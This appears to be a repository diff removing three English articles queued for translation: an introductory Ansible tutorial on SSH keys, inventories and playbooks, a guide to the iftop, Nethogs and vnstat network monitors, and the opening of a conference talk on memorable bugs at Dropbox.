Ansible translates _Ansible playbooks_ into commands that are run over SSH, which has several benefits when it comes to managing Unix-like environments:
|
||||
|
||||
1. Most, if not all of the Unix-like machines you are administering will have SSH running by default.
|
||||
2. Relying on SSH means that no agent is required on the remote host.
|
||||
3. In most cases no additional software needs to be installed as Ansible requires Python 2.6 in order to operate. Most, if not all distributions of Linux have this version (or greater) installed by default.
|
||||
4. Ansible does not require a _master_ node. It can be run from any host that has the Ansible package installed and sufficient SSH access.
|
||||
5. Although running Ansible in a cron job is possible, by default Ansible only runs when you tell it to.
|
||||
|
||||
|
||||
|
||||
#### Setting up SSH key authentication
|
||||
|
||||
A common method for using Ansible is to set up passwordless SSH keys to facilitate ease of management. (Using Ansible Vault for passwords and other sensitive information is possible, but is outside the scope of this article.) For now, simply generate an SSH key with the following command as shown in Example 1.
|
||||
|
||||
##### Example 1: Generating An SSH Key
|
||||
```
|
||||
[09:44 user ~]$ ssh-keygen
|
||||
Generating public/private rsa key pair.
|
||||
Enter file in which to save the key (/home/user/.ssh/id_rsa):
|
||||
Created directory '/home/user/.ssh'.
|
||||
Enter passphrase (empty for no passphrase):
|
||||
Enter same passphrase again:
|
||||
Your identification has been saved in /home/user/.ssh/id_rsa.
|
||||
Your public key has been saved in /home/user/.ssh/id_rsa.pub.
|
||||
The key fingerprint is:
|
||||
SHA256:TpMyzf4qGqXmx3aqZijVv7vO9zGnVXsh6dPbXAZ+LUQ user@user-fedora
|
||||
The key's randomart image is:
|
||||
+---[RSA 2048]----+
|
||||
| |
|
||||
| |
|
||||
| E |
|
||||
| o . .. |
|
||||
| . + S o+. |
|
||||
| . .o * . .+ooo|
|
||||
| . .+o o o oo+.*|
|
||||
|. .ooo* o. * .*+|
|
||||
| . o+*BO.o+ .o|
|
||||
+----[SHA256]-----+
|
||||
```
|
||||
|
||||
In Example 1, the _Enter_ key is used to accept the defaults. An SSH key can be generated by any unprivileged user and installed in any user's SSH **authorized_keys** file on the remote system. After the key has been generated, it will need to be copied to a remote host. To do so, run the following command:
|
||||
```
|
||||
ssh-copy-id root@servera
|
||||
```
|
||||
|
||||
_Note: Ansible does not require root access; however, if you choose to use a non-root user, you_ must _configure the appropriate **sudo** permissions for the tasks you want to accomplish._
|
||||
|
||||
You will be prompted for the root password for **servera** , which will allow your SSH key to be installed on the remote host. After the initial installation of the SSH key, you will no longer be prompted for the root password on the remote host when logging in over SSH.
|
||||
|
||||
### Installing Ansible
|
||||
|
||||
The installation of the Ansible package is only required on the host that generated the SSH key in Example 1. If you are running Fedora, you can issue the following command:
|
||||
```
|
||||
sudo dnf install ansible -y
|
||||
```
|
||||
|
||||
If you run CentOS, you need to configure Extra Packages for Enterprise Linux (EPEL) repositories:
|
||||
```
|
||||
sudo yum install epel-release -y
|
||||
```
|
||||
|
||||
Then you can install Ansible with yum:
|
||||
```
|
||||
sudo yum install ansible -y
|
||||
```
|
||||
|
||||
For Ubuntu-based systems, you can install Ansible from the PPA:
|
||||
```
|
||||
sudo apt-get install software-properties-common -y
|
||||
sudo apt-add-repository ppa:ansible/ansible
|
||||
sudo apt-get update
|
||||
sudo apt-get install ansible -y
|
||||
```
|
||||
|
||||
If you are using macOS, the recommended installation is done via Python PIP:
|
||||
```
|
||||
sudo pip install ansible
|
||||
```
|
||||
|
||||
See the [Ansible installation documentation][2] for other distributions.
|
||||
|
||||
### Working with Ansible Inventory
|
||||
|
||||
Ansible uses an INI-style file called an _Inventory_ to track which servers it may manage. By default this file is located in **/etc/ansible/hosts**. In this article, I will use the Ansible Inventory shown in Example 2 to perform actions against the desired hosts (which has been paired down for brevity):
|
||||
|
||||
##### Example 2: Ansible hosts file
|
||||
```
|
||||
[arch]
|
||||
nextcloud
|
||||
prometheus
|
||||
desktop1
|
||||
desktop2
|
||||
vm-host15
|
||||
|
||||
[fedora]
|
||||
netflix
|
||||
|
||||
[centos]
|
||||
conan
|
||||
confluence
|
||||
7-repo
|
||||
vm-server1
|
||||
gitlab
|
||||
|
||||
[ubuntu]
|
||||
trusty-mirror
|
||||
nwn
|
||||
kids-tv
|
||||
media-centre
|
||||
nas
|
||||
|
||||
[satellite]
|
||||
satellite
|
||||
|
||||
[ocp]
|
||||
lb00
|
||||
ocp_dns
|
||||
master01
|
||||
app01
|
||||
infra01
|
||||
```
|
||||
|
||||
Each group, which is denoted via square brackets and a group name (such as **[group1]** ), is an arbitrary group name that can be applied to a set of servers. A server can exist in multiple groups without issue. In this case, I have groups for operating systems ( _arch_ , _ubuntu_ , _centos_ , _fedora_ ), as well as server function ( _ocp_ , _satellite_ ). The Ansible host file can handle significantly more advanced functionality than what I am using. For more information, see [the Inventory documentation][3].
|
||||
|
||||
### Running ad hoc commands
|
||||
|
||||
After you have copied your SSH keys to all the servers in your inventory, you are ready to start using Ansible. A basic Ansible function is the ability to run ad hoc commands. The syntax is:
|
||||
```
|
||||
ansible -a "some command"
|
||||
```
|
||||
|
||||
For example, if you want to update all of the CentOS servers, you might run:
|
||||
```
|
||||
ansible centos -a 'yum update -y'
|
||||
```
|
||||
|
||||
_Note: Having group names based on the operating system of the server is not necessary. As I will discuss,[Ansible Facts][4] can be used to gather this information; however, issuing ad hoc commands becomes more complex when trying to use Facts, and so for convenience I recommend creating a few groups based on operating system if you manage a heterogeneous environment._
|
||||
|
||||
This will loop over each of the servers in the group **centos** and install all of the updates. A more useful ad hoc command would be the Ansible **ping** module, which is used to verify that a server is ready to receive commands:
|
||||
```
|
||||
ansible all -m ping
|
||||
```
|
||||
|
||||
This will result in Ansible attempting to log in via SSH to all of the servers in your inventory. Truncated output for the **ping** command can be seen in Example 3.
|
||||
|
||||
##### Example 3: Ansible ping command output
|
||||
```
|
||||
nwn | SUCCESS => {
|
||||
"changed": false,
|
||||
"ping": "pong"
|
||||
}
|
||||
media-centre | SUCCESS => {
|
||||
"changed": false,
|
||||
"ping": "pong"
|
||||
}
|
||||
nas | SUCCESS => {
|
||||
"changed": false,
|
||||
"ping": "pong"
|
||||
}
|
||||
kids-tv | SUCCESS => {
|
||||
"changed": false,
|
||||
"ping": "pong"
|
||||
}
|
||||
...
|
||||
```
|
||||
|
||||
The ability to run ad hoc commands is useful for quick tasks, but what if you want to be able to run the same tasks later, in a repeatable fashion? For that Ansible implements [playbooks][5].
|
||||
|
||||
### Ansible playbooks for complex tasks
|
||||
|
||||
An Ansible playbook is a YAML file that contains all the instructions that Ansible should complete during a run. For the purposes of this exercise, I will not get into more advanced topics such as Roles and Templates. If you are interested in learning more, [the documentation][6] is a great place to start.
|
||||
|
||||
In the previous section, I encouraged you to use the **ssh-copy-id** command to propagate your SSH keys; however, this article is focused on how to accomplish tasks in a consistent, repeatable manner. Example 4 demonstrates one method for ensuring, in an idempotent fashion, that an SSH key exists on the target hosts.
|
||||
|
||||
##### Example 4: Ansible playbook "push_ssh_keys.yaml"
|
||||
```
|
||||
---
|
||||
- hosts: all
|
||||
gather_facts: false
|
||||
vars:
|
||||
ssh_key: '/root/playbooks/files/laptop_ssh_key'
|
||||
tasks:
|
||||
- name: copy ssh key
|
||||
authorized_key:
|
||||
key: "{{ lookup('file', ssh_key) }}"
|
||||
user: root
|
||||
```
|
||||
|
||||
In the playbook from Example 4, all of the critical sections are highlighted.
|
||||
|
||||
The **\- hosts:** line indicates which host groups the playbook should evaluate. In this particular case, it is going to examine all of the hosts from our _Inventory_.
|
||||
|
||||
The **gather_facts:** line instructs Ansible to attempt to find out detailed information about each host. I will examine this in more detail later. For now, **gather_facts** is set to **false** to save time.
|
||||
|
||||
The **vars:** section, as one might imagine, is used to define variables that can be used throughout the playbook. In such a short playbook as the one in Example 4, it is more a convenience rather than a necessity.
|
||||
|
||||
Finally the main section is indicated by **tasks:**. This is where most of the instructions are located. Each task should have a **\- name:**. This is what is displayed as Ansible is carrying out a **run** , or playbook execution.
|
||||
|
||||
The **authorized_key:** heading is the name of the Ansible Module that the playbook is using. Information about Ansible Modules can be accessed on the command line via **ansible-doc -a** ; however it may be more convenient to view the [documentation][7] in a web browser. The [authorized_key module][8] has plenty of great examples to get started with. To run the playbook in Example 4, simply use the **ansible-playbook** command:
|
||||
```
|
||||
ansible-playbook push_ssh_keys.yaml
|
||||
```
|
||||
|
||||
If this is the first time adding an SSH key to the box, SSH will prompt you for a password for the root user.
|
||||
|
||||
Now that your servers have SSH keys propagated its time to do something a little more interesting.
|
||||
|
||||
### Ansible and gathering facts
|
||||
|
||||
Ansible has the ability to gather all kinds of facts about the target system. This can consume a significant amount of time if you have a large number of hosts. In my experience, it can take 1 to 2 seconds per host, and possibly longer; however, there are benefits to fact gathering. Consider the following playbook used for turning off the ability for users to log in with a password as the root user:
|
||||
|
||||
##### Example 5: Lock down root SSH account
|
||||
|
||||
```
|
||||
---
|
||||
- hosts: all
|
||||
gather_facts: true
|
||||
vars:
|
||||
tasks:
|
||||
- name: Enabling ssh-key only root access
|
||||
lineinfile:
|
||||
dest: /etc/ssh/sshd_config
|
||||
regexp: '^PermitRootLogin'
|
||||
line: 'PermitRootLogin without-password'
|
||||
notify:
|
||||
- restart_sshd
|
||||
- restart_ssh
|
||||
|
||||
handlers:
|
||||
- name: restart_sshd
|
||||
service:
|
||||
name: sshd
|
||||
state: restarted
|
||||
enabled: true
|
||||
when: ansible_distribution == 'RedHat'
|
||||
- name: restart_ssh
|
||||
service:
|
||||
name: ssh
|
||||
state: restarted
|
||||
enabled: true
|
||||
when: ansible_distribution == 'Debian'
|
||||
```
|
||||
|
||||
In Example 5 the **sshd_config** file is modified with the [conditional][9] only executes if a distribution match is found. In this case Red Hat-based distributions name their SSH service different than Debian-based, which is the purpose for the conditional statement. Although there are other ways to achieve this same effect, the example helps demonstrate Ansible facts. If you want to see all of the facts that Ansible gathers by default, you can run the **setup** module on your localhost:
|
||||
```
|
||||
ansible localhost -m setup |less
|
||||
|
||||
```
|
||||
|
||||
Any fact that is discovered by Ansible can be used to base decisions upon much the same way the **vars:** section that was shown in Example 4 is used. The difference is Ansible facts are considered to be **built in** variables, and thus do not have to be defined by the administrator.
|
||||
|
||||
### Next steps
|
||||
|
||||
Now you have the tools to start investigating Ansible and creating your own playbooks. Ansible is a tool that has so much depth, complexity, and flexibility that it would be impossible to cover everything in one article. This article should be enough to pique your interest and inspire you to explore the possibilities Ansible provides. In my next article, I will discuss the **Copy** , **systemd** , **service** , **apt** , **yum** , **virt** , and **user** modules. We can combine these to create update and installation playbooks, and to create a basic Git server to store all of the playbooks that may get created.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/7/automate-sysadmin-ansible
|
||||
|
||||
作者:[Steve Ovens][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/stratusss
|
||||
[1]:https://opensource.com/tags/ansible
|
||||
[2]:http://docs.ansible.com/ansible/intro_installation.html
|
||||
[3]:http://docs.ansible.com/ansible/intro_inventory.html
|
||||
[4]:http://docs.ansible.com/ansible/playbooks_variables.html#information-discovered-from-systems-facts
|
||||
[5]:http://docs.ansible.com/ansible/playbooks.html
|
||||
[6]:http://docs.ansible.com/ansible/playbooks_roles.html
|
||||
[7]:http://docs.ansible.com/ansible/modules_by_category.html
|
||||
[8]:http://docs.ansible.com/ansible/authorized_key_module.html
|
||||
[9]:http://docs.ansible.com/ansible/lineinfile_module.html
|
@ -1,190 +0,0 @@
|
||||
3 Simple, Excellent Linux Network Monitors
|
||||
============================================================
|
||||
KeyLD translating
|
||||
|
||||
![network](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner_3.png?itok=iuPcSN4k "network")
|
||||
Learn more about your network connections with the iftop, Nethogs, and vnstat tools.[Used with permission][3]
|
||||
|
||||
You can learn an amazing amount of information about your network connections with these three glorious Linux networking commands. iftop tracks network connections by process number, Nethogs quickly reveals what is hogging your bandwidth, and vnstat runs as a nice lightweight daemon to record your usage over time.
|
||||
|
||||
### iftop
|
||||
|
||||
The excellent [iftop][8] listens to the network interface that you specify, and displays connections in a top-style interface.
|
||||
|
||||
This is a great little tool for quickly identifying hogs, measuring speed, and also to maintain a running total of your network traffic. It is rather surprising to see how much bandwidth we use, especially for us old people who remember the days of telephone land lines, modems, screaming kilobits of speed, and real live bauds. We abandoned bauds a long time ago in favor of bit rates. Baud measures signal changes, which sometimes were the same as bit rates, but mostly not.
|
||||
|
||||
If you have just one network interface, run iftop with no options. iftop requires root permissions:
|
||||
|
||||
```
|
||||
$ sudo iftop
|
||||
```
|
||||
|
||||
When you have more than one, specify the interface you want to monitor:
|
||||
|
||||
```
|
||||
$ sudo iftop -i wlan0
|
||||
```
|
||||
|
||||
Just like top, you can change the display options while it is running.
|
||||
|
||||
* **h** toggles the help screen.
|
||||
|
||||
* **n** toggles name resolution.
|
||||
|
||||
* **s** toggles source host display, and **d** toggles the destination hosts.
|
||||
|
||||
* **s** toggles port numbers.
|
||||
|
||||
* **N** toggles port resolution; to see all port numbers toggle resolution off.
|
||||
|
||||
* **t** toggles the text interface. The default display requires ncurses. I think the text display is more readable and better-organized (Figure 1).
|
||||
|
||||
* **p** pauses the display.
|
||||
|
||||
* **q** quits the program.
|
||||
|
||||
|
||||
![text display](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-1_8.png?itok=luKHS5ve "text display")
|
||||
Figure 1: The text display is readable and organized.[Used with permission][1]
|
||||
|
||||
When you toggle the display options, iftop continues to measure all traffic. You can also select a single host to monitor. You need the host's IP address and netmask. I was curious how much of a load Pandora put on my sad little meager bandwidth cap, so first I used dig to find their IP address:
|
||||
|
||||
```
|
||||
$ dig A pandora.com
|
||||
[...]
|
||||
;; ANSWER SECTION:
|
||||
pandora.com. 267 IN A 208.85.40.20
|
||||
pandora.com. 267 IN A 208.85.40.50
|
||||
```
|
||||
|
||||
What's the netmask? [ipcalc][9] tells us:
|
||||
|
||||
```
|
||||
$ ipcalc -b 208.85.40.20
|
||||
Address: 208.85.40.20
|
||||
Netmask: 255.255.255.0 = 24
|
||||
Wildcard: 0.0.0.255
|
||||
=>
|
||||
Network: 208.85.40.0/24
|
||||
```
|
||||
|
||||
Now feed the address and netmask to iftop:
|
||||
|
||||
```
|
||||
$ sudo iftop -F 208.85.40.20/24 -i wlan0
|
||||
```
|
||||
|
||||
Is that not seriously groovy? I was surprised to learn that Pandora is easy on my precious bits, using around 500Kb per hour. And, like most streaming services, Pandora's traffic comes in spurts and relies on caching to smooth out the lumps and bumps.
|
||||
|
||||
You can do the same with IPv6 addresses, using the **-G** option. Consult the fine man page to learn the rest of iftop's features, including customizing your default options with a personal configuration file, and applying custom filters (see [PCAP-FILTER][10] for a filter reference).
|
||||
|
||||
### Nethogs
|
||||
|
||||
When you want to quickly learn who is sucking up your bandwidth, Nethogs is fast and easy. Run it as root and specify the interface to listen on. It displays the hoggy application and the process number, so that you may kill it if you so desire:
|
||||
|
||||
```
|
||||
$ sudo nethogs wlan0
|
||||
|
||||
NetHogs version 0.8.1
|
||||
|
||||
PID USER PROGRAM DEV SENT RECEIVED
|
||||
7690 carla /usr/lib/firefox wlan0 12.494 556.580 KB/sec
|
||||
5648 carla .../chromium-browser wlan0 0.052 0.038 KB/sec
|
||||
TOTAL 12.546 556.618 KB/sec
|
||||
```
|
||||
|
||||
Nethogs has few options: cycling between kb/s, kb, b, and mb, sorting by received or sent packets, and adjusting the delay between refreshes. See `man nethogs`, or run `nethogs -h`.
|
||||
|
||||
### vnstat
|
||||
|
||||
[vnstat][11] is the easiest network data collector to use. It is lightweight and does not need root permissions. It runs as a daemon and records your network statistics over time. The `vnstat`command displays the accumulated data:
|
||||
|
||||
```
|
||||
$ vnstat -i wlan0
|
||||
Database updated: Tue Oct 17 08:36:38 2017
|
||||
|
||||
wlan0 since 10/17/2017
|
||||
|
||||
rx: 45.27 MiB tx: 3.77 MiB total: 49.04 MiB
|
||||
|
||||
monthly
|
||||
rx | tx | total | avg. rate
|
||||
------------------------+-------------+-------------+---------------
|
||||
Oct '17 45.27 MiB | 3.77 MiB | 49.04 MiB | 0.28 kbit/s
|
||||
------------------------+-------------+-------------+---------------
|
||||
estimated 85 MiB | 5 MiB | 90 MiB |
|
||||
|
||||
daily
|
||||
rx | tx | total | avg. rate
|
||||
------------------------+-------------+-------------+---------------
|
||||
today 45.27 MiB | 3.77 MiB | 49.04 MiB | 12.96 kbit/s
|
||||
------------------------+-------------+-------------+---------------
|
||||
estimated 125 MiB | 8 MiB | 133 MiB |
|
||||
```
|
||||
|
||||
By default it displays all network interfaces. Use the `-i` option to select a single interface. Merge the data of multiple interfaces this way:
|
||||
|
||||
```
|
||||
$ vnstat -i wlan0+eth0+eth1
|
||||
```
|
||||
|
||||
You can filter the display in several ways:
|
||||
|
||||
* **-h** displays statistics by hours.
|
||||
|
||||
* **-d** displays statistics by days.
|
||||
|
||||
* **-w** and **-m** displays statistics by weeks and months.
|
||||
|
||||
* Watch live updates with the **-l** option.
|
||||
|
||||
This command deletes the database for wlan1 and stops watching it:
|
||||
|
||||
```
|
||||
$ vnstat -i wlan1 --delete
|
||||
```
|
||||
|
||||
This command creates an alias for a network interface. This example uses one of the weird interface names from Ubuntu 16.04:
|
||||
|
||||
```
|
||||
$ vnstat -u -i enp0s25 --nick eth0
|
||||
```
|
||||
|
||||
By default vnstat monitors eth0\. You can change this in `/etc/vnstat.conf`, or create your own personal configuration file in your home directory. See `man vnstat` for a complete reference.
|
||||
|
||||
You can also install vnstati to create simple, colored graphs (Figure 2):
|
||||
|
||||
```
|
||||
$ vnstati -s -i wlx7cdd90a0a1c2 -o vnstat.png
|
||||
```
|
||||
|
||||
|
||||
![vnstati](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-2_5.png?itok=HsWJMcW0 "vnstati")
|
||||
Figure 2: You can create simple colored graphs with vnstati.[Used with permission][2]
|
||||
|
||||
See `man vnstati` for complete options.
|
||||
|
||||
_Learn more about Linux through the free ["Introduction to Linux" ][7]course from The Linux Foundation and edX._
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linux.com/learn/intro-to-linux/2017/10/3-simple-excellent-linux-network-monitors
|
||||
|
||||
作者:[CARLA SCHRODER ][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linux.com/users/cschroder
|
||||
[1]:https://www.linux.com/licenses/category/used-permission
|
||||
[2]:https://www.linux.com/licenses/category/used-permission
|
||||
[3]:https://www.linux.com/licenses/category/used-permission
|
||||
[4]:https://www.linux.com/files/images/fig-1png-8
|
||||
[5]:https://www.linux.com/files/images/fig-2png-5
|
||||
[6]:https://www.linux.com/files/images/bannerpng-3
|
||||
[7]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
|
||||
[8]:http://www.ex-parrot.com/pdw/iftop/
|
||||
[9]:https://www.linux.com/learn/intro-to-linux/2017/8/how-calculate-network-addresses-ipcalc
|
||||
[10]:http://www.tcpdump.org/manpages/pcap-filter.7.html
|
||||
[11]:http://humdi.net/vnstat/
|
@ -1,313 +0,0 @@
|
||||
yixunx translating
|
||||
|
||||
Love Your Bugs
|
||||
============================================================
|
||||
|
||||
In early October I gave a keynote at [Python Brasil][1] in Belo Horizonte. Here is an aspirational and lightly edited transcript of the talk. There is also a video available [here][2].
|
||||
|
||||
### I love bugs
|
||||
|
||||
I’m currently a senior engineer at [Pilot.com][3], working on automating bookkeeping for startups. Before that, I worked for [Dropbox][4] on the desktop client team, and I’ll have a few stories about my work there. Earlier, I was a facilitator at the [Recurse Center][5], a writers retreat for programmers in NYC. I studied astrophysics in college and worked in finance for a few years before becoming an engineer.
|
||||
|
||||
But none of that is really important to remember – the only thing you need to know about me is that I love bugs. I love bugs because they’re entertaining. They’re dramatic. The investigation of a great bug can be full of twists and turns. A great bug is like a good joke or a riddle – you’re expecting one outcome, but the result veers off in another direction.
|
||||
|
||||
Over the course of this talk I’m going to tell you about some bugs that I have loved, explain why I love bugs so much, and then convince you that you should love bugs too.
|
||||
|
||||
### Bug #1
|
||||
|
||||
Ok, straight into bug #1\. This is a bug that I encountered while working at Dropbox. As you may know, Dropbox is a utility that syncs your files from one computer to the cloud and to your other computers.
|
||||
|
||||
|
||||
|
||||
```
|
||||
+--------------+ +---------------+
|
||||
| | | |
|
||||
| METASERVER | | BLOCKSERVER |
|
||||
| | | |
|
||||
+-+--+---------+ +---------+-----+
|
||||
^ | ^
|
||||
| | |
|
||||
| | +----------+ |
|
||||
| +---> | | |
|
||||
| | CLIENT +--------+
|
||||
+--------+ |
|
||||
+----------+
|
||||
```
|
||||
|
||||
|
||||
Here’s a vastly simplified diagram of Dropbox’s architecture. The desktop client runs on your local computer listening for changes in the file system. When it notices a changed file, it reads the file, then hashes the contents in 4MB blocks. These blocks are stored in the backend in a giant key-value store that we call blockserver. The key is the digest of the hashed contents, and the values are the contents themselves.
|
||||
|
||||
Of course, we want to avoid uploading the same block multiple times. You can imagine that if you’re writing a document, you’re probably mostly changing the end – we don’t want to upload the beginning over and over. So before uploading a block to the blockserver the client talks to a different server that’s responsible for managing metadata and permissions, among other things. The client asks metaserver whether it needs the block or has seen it before. The “metaserver” responds with whether or not each block needs to be uploaded.
|
||||
|
||||
So the request and response look roughly like this: The client says, “I have a changed file made up of blocks with hashes `'abcd,deef,efgh'`”. The server responds, “I have those first two, but upload the third.” Then the client sends the block up to the blockserver.
|
||||
|
||||
|
||||
```
|
||||
+--------------+ +---------------+
|
||||
| | | |
|
||||
| METASERVER | | BLOCKSERVER |
|
||||
| | | |
|
||||
+-+--+---------+ +---------+-----+
|
||||
^ | ^
|
||||
| | 'ok, ok, need' |
|
||||
'abcd,deef,efgh' | | +----------+ | efgh: [contents]
|
||||
| +---> | | |
|
||||
| | CLIENT +--------+
|
||||
+--------+ |
|
||||
+----------+
|
||||
```
|
||||
|
||||
|
||||
|
||||
That’s the setup. So here’s the bug.
|
||||
|
||||
|
||||
|
||||
```
|
||||
+--------------+
|
||||
| |
|
||||
| METASERVER |
|
||||
| |
|
||||
+-+--+---------+
|
||||
^ |
|
||||
| | '???'
|
||||
'abcdldeef,efgh' | | +----------+
|
||||
^ | +---> | |
|
||||
^ | | CLIENT +
|
||||
+--------+ |
|
||||
+----------+
|
||||
```
|
||||
|
||||
Sometimes the client would make a weird request: each hash value should have been sixteen characters long, but instead it was thirty-three characters long – twice as many plus one. The server wouldn’t know what to do with this and would throw an exception. We’d see this exception get reported, and we’d go look at the log files from the desktop client, and really weird stuff would be going on – the client’s local database had gotten corrupted, or python would be throwing MemoryErrors, and none of it would make sense.
|
||||
|
||||
If you’ve never seen this problem before, it’s totally mystifying. But once you’d seen it once, you can recognize it every time thereafter. Here’s a hint: the middle character of each 33-character string that we’d often see instead of a comma was `l`. These are the other characters we’d see in the middle position:
|
||||
|
||||
|
||||
```
|
||||
l \x0c < $ ( . -
|
||||
```
|
||||
|
||||
The ordinal value for an ascii comma – `,` – is 44\. The ordinal value for `l` is 108\. In binary, here’s how those two are represented:
|
||||
|
||||
```
|
||||
bin(ord(',')): 0101100
|
||||
bin(ord('l')): 1101100
|
||||
```
|
||||
|
||||
You’ll notice that an `l` is exactly one bit away from a comma. And herein lies your problem: a bitflip. One bit of memory that the desktop client is using has gotten corrupted, and now the desktop client is sending a request to the server that is garbage.
|
||||
|
||||
And here are the other characters we’d frequently see instead of the comma when a different bit had been flipped.
|
||||
|
||||
|
||||
|
||||
```
|
||||
, : 0101100
|
||||
l : 1101100
|
||||
\x0c : 0001100
|
||||
< : 0111100
|
||||
$ : 0100100
|
||||
( : 0101000
|
||||
. : 0101110
|
||||
- : 0101101
|
||||
```
|
||||
|
||||
|
||||
### Bitflips are real!
|
||||
|
||||
I love this bug because it shows that bitflips are a real thing that can happen, not just a theoretical concern. In fact, there are some domains where they’re more common than others. One such domain is if you’re getting requests from users with low-end or old hardware, which is true for a lot of laptops running Dropbox. Another domain with lots of bitflips is outer space – there’s no atmosphere in space to protect your memory from energetic particles and radiation, so bitflips are pretty common.
|
||||
|
||||
You probably really care about correctness in space – your code might be keeping astronauts alive on the ISS, for example, but even if it’s not mission-critical, it’s hard to do software updates to space. If you really need your application to defend against bitflips, there are a variety of hardware & software approaches you can take, and there’s a [very interesting talk][6] by Katie Betchold about this.
|
||||
|
||||
Dropbox in this context doesn’t really need to protect against bitflips. The machine that is corrupting memory is a user’s machine, so we can detect if the bitflip happens to fall in the comma – but if it’s in a different character we don’t necessarily know it, and if the bitflip is in the actual file data read off of disk, then we have no idea. There’s a pretty limited set of places where we could address this, and instead we decide to basically silence the exception and move on. Often this kind of bug resolves after the client restarts.
|
||||
|
||||
### Unlikely bugs aren’t impossible
|
||||
|
||||
This is one of my favorite bugs for a couple of reasons. The first is that it’s a reminder of the difference between unlikely and impossible. At sufficient scale, unlikely events start to happen at a noticable rate.
|
||||
|
||||
### Social bugs
|
||||
|
||||
My second favorite thing about this bug is that it’s a tremendously social one. This bug can crop up anywhere that the desktop client talks to the server, which is a lot of different endpoints and components in the system. This meant that a lot of different engineers at Dropbox would see versions of the bug. The first time you see it, you can _really_ scratch your head, but after that it’s easy to diagnose, and the investigation is really quick: you look at the middle character and see if it’s an `l`.
|
||||
|
||||
### Cultural differences
|
||||
|
||||
One interesting side-effect of this bug was that it exposed a cultural difference between the server and client teams. Occasionally this bug would be spotted by a member of the server team and investigated from there. If one of your _servers_ is flipping bits, that’s probably not random chance – it’s probably memory corruption, and you need to find the affected machine and get it out of the pool as fast as possible or you risk corrupting a lot of user data. That’s an incident, and you need to respond quickly. But if the user’s machine is corrupting data, there’s not a lot you can do.
|
||||
|
||||
### Share your bugs
|
||||
|
||||
So if you’re investigating a confusing bug, especially one in a big system, don’t forget to talk to people about it. Maybe your colleagues have seen a bug shaped like this one before. If they have, you might save a lot of time. And if they haven’t, don’t forget to tell people about the solution once you’ve figured it out – write it up or tell the story in your team meeting. Then the next time your teams hits something similar, you’ll all be more prepared.
|
||||
|
||||
### How bugs can help you learn
|
||||
|
||||
### Recurse Center
|
||||
|
||||
Before I joined Dropbox, I worked for the Recurse Center. The idea behind RC is that it’s a community of self-directed learners spending time together getting better as programmers. That is the full extent of the structure of RC: there’s no curriculum or assignments or deadlines. The only scoping is a shared goal of getting better as a programmer. We’d see people come to participate in the program who had gotten CS degrees but didn’t feel like they had a solid handle on practical programming, or people who had been writing Java for ten years and wanted to learn Clojure or Haskell, and many other profiles as well.
|
||||
|
||||
My job there was as a facilitator, helping people make the most of the lack of structure and providing guidance based on what we’d learned from earlier participants. So my colleagues and I were very interested in the best techniques for learning for self-motivated adults.
|
||||
|
||||
### Deliberate Practice
|
||||
|
||||
There’s a lot of different research in this space, and one of the ones I think is most interesting is the idea of deliberate practice. Deliberate practice is an attempt to explain the difference in performance between experts & amateurs. And the guiding principle here is that if you look just at innate characteristics – genetic or otherwise – they don’t go very far towards explaining the difference in performance. So the researchers, originally Ericsson, Krampe, and Tesch-Romer, set out to discover what did explain the difference. And what they settled on was time spent in deliberate practice.
|
||||
|
||||
Deliberate practice is pretty narrow in their definition: it’s not work for pay, and it’s not playing for fun. You have to be operating on the edge of your ability, doing a project appropriate for your skill level (not so easy that you don’t learn anything and not so hard that you don’t make any progress). You also have to get immediate feedback on whether or not you’ve done the thing correctly.
|
||||
|
||||
This is really exciting, because it’s a framework for how to build expertise. But the challenge is that as programmers this is really hard advice to apply. It’s hard to know whether you’re operating at the edge of your ability. Immediate corrective feedback is very rare – in some cases you’re lucky to get feedback ever, and in other cases maybe it takes months. You can get quick feedback on small things in the REPL and so on, but if you’re making a design decision or picking a technology, you’re not going to get feedback on those things for quite a long time.
|
||||
|
||||
But one category of programming where deliberate practice is a useful model is debugging. If you wrote code, then you had a mental model of how it worked when you wrote it. But your code has a bug, so your mental model isn’t quite right. By definition you’re on the boundary of your understanding – so, great! You’re about to learn something new. And if you can reproduce the bug, that’s a rare case where you can get immediate feedback on whether or not your fix is correct.
|
||||
|
||||
A bug like this might teach you something small about your program, or you might learn something larger about the system your code is running in. Now I’ve got a story for you about a bug like that.
|
||||
|
||||
### Bug #2
|
||||
|
||||
This bug also one that I encountered at Dropbox. At the time, I was investigating why some desktop client weren’t sending logs as consistently as we expected. I’d started digging into the client logging system and discovered a bunch of interesting bugs. I’ll tell you only the subset of those bugs that is relevant to this story.
|
||||
|
||||
Again here’s a very simplified architecture of the system.
|
||||
|
||||
|
||||
```
|
||||
+--------------+
|
||||
| |
|
||||
+---+ +----------> | LOG SERVER |
|
||||
|log| | | |
|
||||
+---+ | +------+-------+
|
||||
| |
|
||||
+-----+----+ | 200 ok
|
||||
| | |
|
||||
| CLIENT | <-----------+
|
||||
| |
|
||||
+-----+----+
|
||||
^
|
||||
+--------+--------+--------+
|
||||
| ^ ^ |
|
||||
+--+--+ +--+--+ +--+--+ +--+--+
|
||||
| log | | log | | log | | log |
|
||||
| | | | | | | |
|
||||
| | | | | | | |
|
||||
+-----+ +-----+ +-----+ +-----+
|
||||
```
|
||||
|
||||
The desktop client would generate logs. Those logs were compress, encrypted, and written to disk. Then every so often the client would send them up to the server. The client would read a log off of disk and send it to the log server. The server would decrypt it and store it, then respond with a 200.
|
||||
|
||||
If the client couldn’t reach the log server, it wouldn’t let the log directory grow unbounded. After a certain point it would start deleting logs to keep the directory under a maximum size.
|
||||
|
||||
